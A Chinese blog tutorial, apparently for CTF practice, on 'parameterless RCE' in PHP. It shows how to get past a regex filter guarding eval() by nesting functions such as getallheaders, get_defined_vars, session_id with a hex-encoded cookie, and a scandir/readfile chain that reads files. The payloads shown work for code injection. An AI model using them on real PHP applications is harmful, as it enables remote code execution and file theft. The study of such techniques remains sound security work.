RCE绕过之无参数RCE

最新推荐文章于 2024-04-10 16:31:45 发布
最新推荐文章于 2024-04-10 16:31:45 发布
阅读量1.3k 收藏 7
点赞数
分类专栏: RCE 文章标签: web 网络安全 RCE
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46706771/article/details/119034638
版权

什么是无参数函数RCE

我们常用eval($_GET['code']);来实现一句换木马和getshell

但是如果开发者进行了过滤

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}

那么我们就无法使用参数,也就无法通过正则的校验

在此过滤条件下我们只能执行如下格式的函数

a();
a(b());

不可使用

a('abc');
①getenv()

使用getenv()获取一个环境变量的值

在这里插入图片描述

使用array_rand()来取出数组

在这里插入图片描述

使用arrat_flip()来取出数组中的值

在这里插入图片描述

注意每次运行输出的字符串是随机的

例子:

<?php
$test = array('1', '2', 'a', 'b', 'flag', 'C1yas0', 'admin', 'hello');
for ($i = 0; $i < 10; $i++) {
    var_dump(array_rand(array_flip($test)));
}
?>

在这里插入图片描述
在这里插入图片描述

②getallheaders()

获取所有环境变量的列表,可以看到,成功返回了http header,我们可以在header中自定义内容

code=var_dump(getallheaders());

hacker: phpinfo();


在这里插入图片描述

③get_defined_vars()

get_defined_vars()可以回显全局变量_GET $_POST $_FILES $_COOKIE

可以利用$_GET进行RCE

code=var_dump(current(get_defined_vars()));&hacker=phpinfo();

在这里插入图片描述

④session_id()

在这里插入图片描述

SESSIONID只能为字母和数字,所以我们可以用十六进制

eval(hex2bin(session_id(session_start())));

Cookie: PHPSESSID=706870696e666f28293b
(706870696e666f28293b为phpinfo();的十六进制编码)

在这里插入图片描述

⑤dirname() & chdir()

我们可以利用getcwd()获取当前目录

在这里插入图片描述
dirname()返回上级目录
在这里插入图片描述

使用chdir(dirname(getcwd()))来更改目录

最终paylocd:

?code=readfile(next(array_reverse(scandir(dirname(chdir(dirname(getcwd())))))));

返回主页

C1yas0
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
参数RCE绕过的详细总结(六种方法)
2301_76690905的博客
10-26 2820
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
【python】OCR
bryant_meng
12-16 3115
先看看百度百科对 OCR 的定义: OCR (Optical Character Recognition,光学字符识别)是指电子设备(例如扫描仪或数码相机)检查纸上打印的字符,通过检测暗、亮的模式确定其形状,然后用字符识别方法将形状翻译成计算机文字的过程;即,针对印刷体字符,采用光学的方式将纸质文档中的文字转换成为黑白点阵的图像文件,并通过识别软件将图像中的文字转换成文本格式,供文字处理软件进一步编辑加工的技术。如何除错或利用辅助信息提高识别正确率,是OCR最重要的课题,ICR(Intelligent C.
无参rce总结
weixin_66839513的博客
04-10 616
if(';R)?正则表达式 [^\W]+\((?R)?\) 匹配了一个或多个(表示函数名),后跟一个括号(表示函数调用)。其中 (?R) 是递归引用,它只能匹配和替换嵌套的函数调用,而不能处理函数参数。使用该正则表达式进行替换后,每个函数调用都会被删除,只剩下一个分号;,而最终结果强等于;时,payload才能进行下一步。简而言之,无参数rce就是不使用参数,而只使用一个个函数最终达到目的。
web和pwn题的简单动态flag实现
qq_52820087的博客
11-14 4427
作为一个出题人需要有一些觉悟,这周花了三天时间去研究Dockerfile的写法,主要还是为了实现动态flag,思路理顺了就会发现,原来Dockerfile和动态flag这么简单,这里直接现写两个简单的题目来演示一下。使用build命令,构建题目镜像,name为dockerhub名(自行注册登录),webtest为镜像名(自定义),"."为版本号,代表latest,也可以自定义,不过拉取时记得加上版本号。把"start.sh"改为"flag.sh",以下为flag.sh的具体内容。
sqli-labs通关全解---有关过滤的绕过--less23,25~28,32~37--8
cyynid的博客
01-12 857
preg_replace()用于sql注入防护中,主要是将一些疑似攻击的代码进行替换处理,从而使得他无法达到攻击的目的,例如将‘/’替换成空格,将union替换成空格等,但是由于攻击方式的多样化和程序员的疏忽,往往无法过滤掉所有的攻击,甚至可以对此类过滤进行绕过处理。返回在预定义字符之前添加反斜杠的字符串。即将预定义的字符进行转义提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。本文列举了一些对此类过滤方法的绕过手段,同样,也可以针对绕过手段,进行更加安全的过滤。
ctfshow web入门 php特性
qq_53063436的博客
12-31 743
web89 通过数组绕过 playload: ?num[]=1 web90 用小数进行绕过 playload ?num=4476.1 web91 show_source(__FILE__); include('flag.php'); $a=$_GET['cmd']; if(preg_match('/^php$/im', $a)){ if(preg_match('/^php$/i', $a)){ echo 'hacker'; } else{ echo
catf1ag Web writeup(wp) 可能会持续更新
mumuzi的博客
01-14 3437
catf1ag web水文
参数 rce.md
04-01
记录一下,关于这次比赛的 wp >.< 并向大佬们积极学习 >.< 顺便混点分
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
rce-website:RCE网站
05-09
RCE网站RCE的主页(登录页面)和公告( )。 基于和修改的Polar主题。本地安装安装Python3( 完美运行) 安装Pelican和支持库pip install invoke==1.4.1pip install pelican==3.7.1pip install markdown==3.1.1如果...
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
参数RCE
m0_62422842的博客
05-11 1477
正则的递归 正则表达式中有一种递归的用法,今天才知道。但是这种递归用法并不是所有语言都支持。它适用于PHP和java等语言。 以下列出几个简单的递归 (?R)? (?0)? \g<0>? 加号 , + 星号 * 问号 ? 一般来说问号也是递归的一种 一般用到最多就是?R。 括号里不能有参数,而有些题中就就会用这种递归的正则来过滤恶意函数,所以我们就用无参的函数像上图中套娃一样注入命令。 无参数RCE 一般情况下的命令执行都是由参数的,比如system函数,eval函数 ...
命令执行RCE及其绕过详细总结(各情景下的绕过
2301_76690905的博客
12-12 4248
scandir() :将返回当前目录中的所有文件和目录的列表。返回的结果是一个数组,其中包含当前目录下的所有文件和目录名称(glob()可替换)localeconv() :返回一包含本地数字及货币格式信息的数组。(但是这里数组第一项就是‘.’,这个.的用处很大)current() :返回数组中的单元,默认取第一个值。pos()和current()是同一个东西getcwd() :取得当前工作目录dirname():函数返回路径中的目录部分。
php无参执行RCE
遇事不决冲冲冲
03-23 3101
php无参执行RCE一般来说当我们可以控制或自己上传一个木马后,就可以进行任意命令执行,但像上面这样`/[^\W]+\((?R)?\)/`的正则过滤方式,我们不能输入任何参数,这样想绕过的话一个大的思路就是通过套娃,通过让一个函数的返回值作为另一个函数的参数,也就是这样`a(b(c()));`,最终达到rce的效果,下面列几种绕过方法
参数读文件和RCE总结
kuzemax的博客
07-18 775
什么是无参数?顾名思义,就是只使用函数,且函数不能带有参数,这里有种种限制:比如我们选择的函数必须能接受其括号内函数的返回值;
参数RCE绕过之禁止套娃
qq_58970968的博客
07-10 460
知识点:无参数REC 一般有三种绕过姿势:参考文章:无参数RCE总结_L1am0ur的博客-CSDN博客_无参数rce 1.概念: 无参数RCE,其实就是通过没有参数的函数达到命令执行的目的。 没有参数的函数什么意思?一般该类题目代码如下(或类似): 有三种绕过:这里主要讲session_id(),具体其他方法参考原文章;参考文章绝优秀,思路清晰,知识全面;session_id必须要开启session才可以使用,所以我们要先使用session_start所以组合起来就是:session_id(sessi
命令执行漏洞的利用以及绕过方式
cosmoslin的博客
09-14 1878
命令执行漏洞的利用以及绕过方式 1 preg_match()函数 preg_match 函数用于执行一个正则表达式匹配。 int preg_match ( string $pattern , string $subject [, array &$matches [, int $flags = 0 [, int $offset = 0 ]]] ) 参数 说明 $pattern 要搜索的模式,字符串形式 $subject 要搜索检测的目标字符串 $matches 如果提供了参数
CG-CTF 综合题2(sql注入绕过、注入技巧、preg_replace()漏洞)☆
Sea_Sand息禅
03-19 5736
这道题确实综合性挺强的。 1、老程序,先收集信息。 页面可以输入的地方可以输入些信息试试,搜索框输入1,会转到so.php,这里是有sql查询的。 留言的地方,输入可以转到preview.php,预览之后转到say.php。 最下面有个“本CMS说明”,这个点击之后会得到更多的信息: config.php index.php passencode.php say.php sm.txt 还给了我们...
fastjson rce
09-16
Fastjson RCE(Remote Code Execution)是指在使用Fastjson这个Java库时,存在远程代码执行的风险。在Fastjson版本1.2.24及以下的版本中,存在RCE问题。这个问题是由于Fastjson引入了AutoType特性,但在安全方面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

C1yas0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值